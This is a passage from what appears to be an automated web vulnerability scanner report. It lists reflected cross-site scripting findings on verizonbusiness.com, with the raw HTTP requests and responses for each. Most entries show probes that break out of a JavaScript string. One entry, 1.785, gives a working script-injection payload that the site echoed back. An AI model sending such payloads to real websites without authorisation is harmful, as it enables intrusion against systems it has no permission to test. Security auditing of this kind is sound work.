User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:53 GMT
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources138e6";d589f0b49a9/media/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.783. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28a0d'%3bed9d86ee0d6 was submitted in the REST URL parameter 2. This input was echoed as 28a0d';ed9d86ee0d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media28a0d'%3bed9d86ee0d6/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media28a0d';ed9d86ee0d6/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.784. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6926f"%3b286bf2b63b7 was submitted in the REST URL parameter 2. This input was echoed as 6926f";286bf2b63b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media6926f"%3b286bf2b63b7/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media6926f";286bf2b63b7/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.785. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ee41</script><script>alert(1)</script>e0ba20b73a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/index-131046-wifi+shopping+borders.xml3ee41</script><script>alert(1)</script>e0ba20b73a0 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "f80a741cbae3686cc86be338fb08d02b"
Last-Modified: Wed, 17 Nov 2010 00:05:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21304
Date: Wed, 17 Nov 2010 00:05:43 GMT
Connection: close
Set-Cookie: BERT=VRID%3d3a9413df-40dd-4ddb-b6fa-fa541ff67c82|VTID%3d8c0efedf-ba1b-43f7-a1de-e3c30f37fa47|SX%3d1289953542|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:09:26 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:05:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<url>/resources/media/index-131046-wifi+shopping+borders.xml3ee41</script><script>alert(1)</script>e0ba20b73a0</url>
...[SNIP]...

1.786. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8655d"%3bf0bb820239a was submitted in the REST URL parameter 1. This input was echoed as 8655d";f0bb820239a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8655d"%3bf0bb820239a/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8655d";f0bb820239a/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.787. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd429'%3b22d12cfda25 was submitted in the REST URL parameter 1. This input was echoed as cd429';22d12cfda25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescd429'%3b22d12cfda25/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcescd429';22d12cfda25/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.788. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b32d"%3b59180184350 was submitted in the REST URL parameter 2. This input was echoed as 2b32d";59180184350 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media2b32d"%3b59180184350/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:03 GMT
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media2b32d";59180184350/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.789. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 107f9'%3bc46e19b26b1 was submitted in the REST URL parameter 2. This input was echoed as 107f9';c46e19b26b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media107f9'%3bc46e19b26b1/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media107f9';c46e19b26b1/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.790. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec1e"%3b7c09e426ee6 was submitted in the REST URL parameter 3. This input was echoed as 1ec1e";7c09e426ee6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/index.xml1ec1e"%3b7c09e426ee6?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 38181
Date: Wed, 17 Nov 2010 00:05:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media/index.xml1ec1e";7c09e426ee6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.791. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 189e1'%3bb084a49165 was submitted in the REST URL parameter 3. This input was echoed as 189e1';b084a49165 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/index.xml189e1'%3bb084a49165?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:41 GMT
Content-Type: text/html
Content-Length: 38181
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media/index.xml189e1';b084a49165'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.792. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a95'%3be4ecccbdf2b was submitted in the REST URL parameter 1. This input was echoed as 88a95';e4ecccbdf2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources88a95'%3be4ecccbdf2b/media/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources88a95';e4ecccbdf2b/media/large-131367-customer+service+week.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.793. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 570a1"%3b07c3c90e857 was submitted in the REST URL parameter 1. This input was echoed as 570a1";07c3c90e857 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources570a1"%3b07c3c90e857/media/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources570a1";07c3c90e857/media/large-131367-customer+service+week.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.794. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e528f'%3b81d1e27ae8a was submitted in the REST URL parameter 2. This input was echoed as e528f';81d1e27ae8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/mediae528f'%3b81d1e27ae8a/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40300
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/mediae528f';81d1e27ae8a/large-131367-customer+service+week.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.795. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b15"%3b7510c4873f8 was submitted in the REST URL parameter 2. This input was echoed as 58b15";7510c4873f8 in the application's response.

